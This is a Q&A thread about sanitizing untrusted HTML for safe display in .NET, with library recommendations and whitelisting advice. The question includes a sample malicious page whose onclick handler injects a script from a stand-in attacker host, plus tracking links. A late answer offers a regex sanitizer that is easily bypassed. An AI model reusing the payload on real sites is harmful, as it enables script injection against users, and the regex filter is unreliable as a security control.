What can I use to sanitize received HTML while retaining basic formatting?

Asked 30/12, 2010 at 10:17 Answered 20/11, 2014 at 15:31

This is a common problem, so I'm hoping it's been thoroughly solved for me.

In a system I'm doing for a client, we want to accept HTML from untrusted sources (HTML-formatted email and also HTML files), sanitize it so it doesn't have any scripting, links to external resources, and other security/etc. issues; and then display it safely while not losing the basic formatting. E.g., much as an email client would do with HTML-formatted email, but ideally without repeating the 347,821 mistakes that have been made (so far) in that arena. :-)

The goal is to end up with something we'd feel comfortable displaying to internal users via an iframe in our own web interface, or via the WebBrowser class in a .Net Windows Forms app (which seems to be no safer, possibly less so), etc. Example below.

We recognize that some of this may well muck up the display of the text; that's okay.

We'll be sanitizing the HTML on receipt and storing the sanitized version (don't worry about the storage part — SQL injection and the like — we've got that bit covered).

The software will need to run on Windows Server. COM DLL or .Net assembly preferred. FOSS markedly preferred, but not a deal-breaker.

What I've found so far:

The AntiSamy.Net project (but it appears to no longer be under active development, being over a year behind the main — and active — AntiSamy Java project).
Some code from our very own Jeff Atwood, circa three years ago (gee, I wonder what he was doing...).
The HTML Agility Pack (used by the AntiSamy.Net project above), which would give me a robust parser; then I could implement my own logic for walking through the resulting DOM and filtering out anything I didn't whitelist. The agility pack looks really great, but I'd be relying on my own whitelist rather than reusing a wheel that someone's already invented, so that's a ding against it.
The Microsoft Anti-XSS library

What would you recommend for this task? One of the above? Something else?

For example, we want to remove things like:

script elements
link, img, and such elements that reach out to external resources (probably replace img with the text "[image removed]" or some such)
embed, object, applet, audio, video, and other tags that try to create objects
onclick and similar DOM0 event handler script code
hrefs on a elements that trigger code (even links we think are okay we may well turn into plaintext that users have to intentionally copy and paste into a browser).
__________ (the 722 things I haven't thought of that are the reason I'm looking to leverage something that already exists)

So for instance, this HTML:

<!DOCTYPE html>
<html>
<head>
<title>Example</title>
<link rel="stylesheet" type="text/css" href="http://evil.example.com/tracker.css">
</head>
<body>
<p onclick="(function() { var s = document.createElement('script'); s.src = 'http://evil.example.com/scriptattack.js'; document.body.appendChild(s); })();">
<strong>Hi there!</strong> Here's my nefarious tracker image:
<img src='http://evil.example.com/xparent.gif'>
</p>
</body>
</html>

would become

<!DOCTYPE html>
<html>
<head>
<title>Example</title>
</head>
<body>
<p>
<strong>Hi there!</strong> Here's my nefarious tracker image:
[image removed]
</p>
</body>
</html>

(Note we removed the link and the onclick entirely, and replaced the img with a placeholder. This is just a small subset of what we figure we'll need to strip out.)
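The transformation above can be sketched as a whitelist walk over an already-parsed tree. This is only a minimal illustration, not a vetted sanitizer: the tree shape (strings for text, `{ tag, attrs, children }` for elements), the function names, and the specific tag and attribute lists are all assumptions made for the example, and a real parser such as the HTML Agility Pack would supply its own node types.

```javascript
// Hypothetical tree shape (an assumption for this sketch): text nodes are
// plain strings, element nodes are { tag, attrs, children }.
const ALLOWED_TAGS = new Set(["html", "head", "title", "body", "p", "strong", "em", "b", "i", "br"]);
const ALLOWED_ATTRS = new Set(["title"]); // everything else, including on* handlers, is dropped
const DROP_WITH_CONTENT = new Set(["script", "style", "embed", "object", "applet", "audio", "video"]);
const VOID_TAGS = new Set(["br"]);

// Returns an array of sanitized nodes that replace the given node.
function sanitizeNode(node) {
  if (typeof node === "string") return [node];
  const tag = node.tag.toLowerCase();
  if (tag === "img") return ["[image removed]"];   // placeholder instead of the image
  if (DROP_WITH_CONTENT.has(tag)) return [];       // remove the tag and its content
  const children = (node.children || []).flatMap(sanitizeNode);
  if (!ALLOWED_TAGS.has(tag)) return children;     // unknown tag: keep only its content
  const attrs = {};
  for (const [name, value] of Object.entries(node.attrs || {})) {
    if (ALLOWED_ATTRS.has(name.toLowerCase())) attrs[name.toLowerCase()] = String(value);
  }
  return [{ tag, attrs, children }];
}

function escapeHtml(text) {
  return text.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;").replace(/"/g, "&quot;");
}

// Serializes a sanitized node back to markup, escaping text and attribute values.
function serialize(node) {
  if (typeof node === "string") return escapeHtml(node);
  const attrs = Object.entries(node.attrs).map(([k, v]) => ` ${k}="${escapeHtml(v)}"`).join("");
  if (VOID_TAGS.has(node.tag)) return `<${node.tag}${attrs}>`;
  return `<${node.tag}${attrs}>${node.children.map(serialize).join("")}</${node.tag}>`;
}

// The paragraph from the example, written out by hand as a tree.
const paragraph = {
  tag: "p",
  attrs: { onclick: "/* attack code */" },
  children: [
    { tag: "strong", attrs: {}, children: ["Hi there!"] },
    " Here's my nefarious tracker image: ",
    { tag: "img", attrs: { src: "http://evil.example.com/xparent.gif" }, children: [] },
  ],
};
console.log(sanitizeNode(paragraph).map(serialize).join(""));
```

Because anything not listed is dropped or unwrapped, a link element disappears without needing a rule of its own, which is the main attraction of whitelisting over enumerating bad tags.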

Lastly answered 30/12, 2010 at 10:17 Comment(1)

Good question. Manual parsing would be a nightmare. – Destiny 30/12, 2010 at 14:39

This is an older, but still relevant question.

We are using the HtmlSanitizer .Net library, which:

is open-source
is actively maintained
doesn't have the problems that the Microsoft Anti-XSS library has
is unit tested with the OWASP XSS Filter Evasion Cheat Sheet
is purpose-built for this (in contrast to the HTML Agility Pack, which is a parser)

Also on NuGet

Newsmonger answered 20/11, 2014 at 15:31 Comment(1)

Looks nice! Thanks! These days, of course, the question would be closed as a "recommendation" question. I really appreciate your answering anyway. – Lastly 20/11, 2014 at 16:3

I sense you would definitely need a parser that can generate an XML/DOM source, so that you can apply a filter to it to produce what you are looking for.

See if the HtmlTidy, Mozilla, or HtmlCleaner parsers can help. HtmlCleaner has a lot of configurable options that you might also want to look at, specifically the transform section, which allows you to skip the tags you don't require.

Elute answered 30/12, 2010 at 15:47 Comment(5)

Thanks! Yes, while a parser is a significant piece, as I mentioned vis-a-vis the HTML Agility Pack, another significant piece is knowing what to leave out / what to keep in. I'd rather stand on shoulders than create my own list from scratch... (But if I have to, I will.) Thanks for the parser links! – Lastly 30/12, 2010 at 16:2

Look at the transform section here: htmlcleaner.sourceforge.net/parameters.php#transform. It has a provision for skipping tags. – Elute 30/12, 2010 at 16:6

Yes, I understand. My point is the list of tags (and attribute and ...) to skip. – Lastly 30/12, 2010 at 16:11

@T.J.: You have it a bit backwards: use a tag and attribute whitelist (i.e. allow only these things through) rather than a blacklist (i.e. don't allow these things through). You'll also want to sanitize src, href, style, ... attributes if you're letting them through. Knowing what is safe is easier than knowing what isn't; whitelisting also makes styling easier. – Magdalenamagdalene 2/1, 2011 at 21:13

@mu is too short: Yes, sorry, it's not clear from the question but I'm clear that it needs to be a whitelist, not a blacklist. – Lastly 2/1, 2011 at 22:13
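The point about sanitizing href and src values can be illustrated with a scheme whitelist. This is a rough sketch under stated assumptions: the function name `isSafeUrl`, the placeholder base URL, and the list of allowed schemes are made up for the example, and the check relies on the standard `URL` class available in browsers and Node.js. It only classifies the scheme; it does not stop an allowed http(s) URL from pointing at an external tracker.

```javascript
// Schemes we are willing to let through (an assumption; adjust to taste).
const ALLOWED_SCHEMES = new Set(["http:", "https:", "mailto:"]);

function isSafeUrl(value) {
  // Drop whitespace and control characters before classifying, so that
  // inputs like "java\tscript:..." cannot hide the scheme. The cleaned
  // string is used only for this check, not as the stored value.
  const cleaned = String(value).replace(/[\u0000-\u0020\u007f]+/g, "");
  let url;
  try {
    // The base lets relative references parse; it is a placeholder only.
    url = new URL(cleaned, "http://placeholder.invalid/");
  } catch (e) {
    return false; // unparseable input is rejected rather than guessed at
  }
  return ALLOWED_SCHEMES.has(url.protocol);
}

console.log(isSafeUrl("https://example.com/page"));  // true
console.log(isSafeUrl("javascript:alert(1)"));       // false
```

Checking against a short list of allowed schemes follows the same logic as the tag whitelist: new or obscure schemes are rejected by default instead of needing to be anticipated.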

I would suggest another approach. If you control how the HTML is viewed, I would remove all threats by using an HTML renderer that doesn't have an ECMAScript engine or any XSS capability. I see you are going to use the built-in WebBrowser object, and rightly so, you want to produce HTML that cannot be used to attack your users.

I recommend looking for a basic HTML display engine, one that cannot parse or understand any of the scripting functionality that would make you vulnerable. All the JavaScript would then just be ignored.

This does have another problem though. You would need to ensure that the viewer you are using isn't susceptible to other types of attacks.

Veto answered 2/1, 2011 at 20:17 Comment(1)

Thanks. Such a viewer would also have to have a means of allowing me to control (prevent) all requests for external resources (like tracking images and such). A pure renderer would presumably do that as a by-product of wanting me to supply something to retrieve the reference for it, though. :-) Cheers, – Lastly 25/1, 2011 at 16:37

I suggest looking at http://htmlpurifier.org/. Their library is pretty complete.

Anthracoid answered 2/1, 2011 at 17:29 Comment(1)

Thanks. PHP is completely out of the equation, but that doesn't mean I can't look at their whitelist for some inspiration. – Lastly 2/1, 2011 at 17:31

Interesting problem. I spent some time on it, because there are a lot of things we want to remove from user input, and even if I make a long list of things to remove, HTML can evolve later on and my list would have holes. Nonetheless, I want users to be able to input some simple things like bold, italic, paragraphs... pretty simple. No doubt the list of allowed things is shorter, and if HTML changes later on, that won't make holes in my list unless HTML stops supporting these simple things. So start thinking the other way around: say just what you allow. With great pain, because I'm not an expert on regex (so please, regex people, correct me here or improve this), I coded this expression, and it has been working for me since before HTML5 arrived.

replace(/(?!<[/]?(b|i|p|br)(\s[^<]*>|[/]>|>))<[^>]*>/gi,"")

(b|i|p|br) <- this is the list of allowed tags, feel free to add some.

This is a starting point, and that's why some regex people should improve it to also remove the attributes, like onclick.

If I do this:

(?!<[/]?(b|i|p|br)(\s*>|[/]>|>))<[^>]*>

Tags with onclick or other stuff will be removed, but the corresponding closing tags will remain. And after all, we don't want those tags removed; we just want to remove the tag attributes.

Maybe a second regex pass with

(?!<[^<>\s]+)\s[^</>]+(?=[/>])

Am I right? Can this be composed into a single pass?

We still have no relation between tags (opening/closing), but that's no great deal for now. Can the attribute removal be written to remove everything that is not on a whitelist? (Possibly yes.)
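One way to get a single pass is to let `String.prototype.replace` call a function for every tag-like run and rebuild allowed tags without their attributes. The sketch below is an illustration of that idea rather than a drop-in fix for the expressions above; the name `stripTags` and the `ALLOWED` set are assumptions. It is not a robust sanitizer: an attribute value containing `>` will confuse it, and the content of removed tags such as script stays in the output.

```javascript
// Tags that survive (without any attributes); everything else is dropped.
const ALLOWED = new Set(["b", "i", "p", "br"]);

function stripTags(html) {
  // Visit every "<...>" run once. Allowed tags are rebuilt as bare
  // "<name>" or "</name>", so attributes such as onclick never survive.
  return html.replace(/<[^>]*>/g, (match) => {
    const parts = /^<(\/?)([a-z][a-z0-9]*)(?=[\s\/>])/i.exec(match);
    if (!parts) return "";                 // comments, doctype, malformed tags
    const name = parts[2].toLowerCase();
    return ALLOWED.has(name) ? `<${parts[1]}${name}>` : "";
  });
}

console.log(stripTags('<p onclick="x()">Hi <b class="c">there</b><br/><font color="red">!</font></p>'));
// <p>Hi <b>there</b><br>!</p>
```

Rebuilding the tag from its name, instead of trying to cut the attributes out of the original text, sidesteps the question of matching attribute syntax at all.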

A last problem: when removing tags like script, the content remains. That's desirable when removing font but not script. Well, we can do a first pass with

<(script|object|embed)[^>]*>[\s\S]*?</\1>

That will remove certain tags and their content, but it's a blacklist, meaning you have to keep an eye on it in case HTML changes.
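One detail worth checking in a pattern of this shape is how the "anything in between" part is matched. The sketch below compares a greedy `.*` with a lazy `[\s\S]*?` on two made-up inputs (the sample strings and variable names are assumptions for the illustration). In JavaScript, `.` does not match newlines, and a greedy match runs to the last closing tag on the line.

```javascript
const greedy = /<(script|object|embed)[^>]*>.*<\/\1>/gi;
const lazy = /<(script|object|embed)[^>]*>[\s\S]*?<\/\1>/gi;

// Two scripts on one line with wanted content between them.
const oneLine = "<script>a()</script><b>keep me</b><script>b()</script>";
// A script whose body spans several lines.
const multiLine = "<p>x</p><script>\nb()\n</script>";

console.log(JSON.stringify(oneLine.replace(greedy, "")));   // "" (the <b> is lost too)
console.log(JSON.stringify(oneLine.replace(lazy, "")));     // "<b>keep me</b>"
console.log(JSON.stringify(multiLine.replace(greedy, ""))); // unchanged, script survives
console.log(JSON.stringify(multiLine.replace(lazy, "")));   // "<p>x</p>"
```

Neither form handles nested or malformed markup, so this remains a stopgap in front of a real parser rather than a replacement for one.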

note: all with "gi"

Edit:

I joined all of the above into this function:

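String.prototype.sanitizeHTML = function (white, black) {
   if (!white) white = "b|i|p|br"; // allowed tags
   if (!black) black = "script|object|embed"; // tags removed together with their content
   // [\s\S]*? rather than .* so the match spans newlines and stops at the first closing tag;
   // declared with var so the regex does not leak into the global scope
   var e = new RegExp("(<(" + black + ")[^>]*>[\\s\\S]*?</\\2>|(?!<[/]?(" + white + ")(\\s[^<]*>|[/]>|>))<[^<>]*>|(?!<[^<>\\s]+)\\s[^</>]+(?=[/>]))", "gi");
   return this.replace(e, "");
};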

- black list -> the tag and its content are removed completely
- white list -> these tags are retained; other tags are removed, but their content is retained
- all attributes of whitelisted tags (the remaining ones) are removed

There is still room for a whitelist of attributes (not implemented above), because if I want to preserve IMG then the src must stay... and what about tracking images?

Extravagancy answered 30/12, 2010 at 10:17 Comment(0)
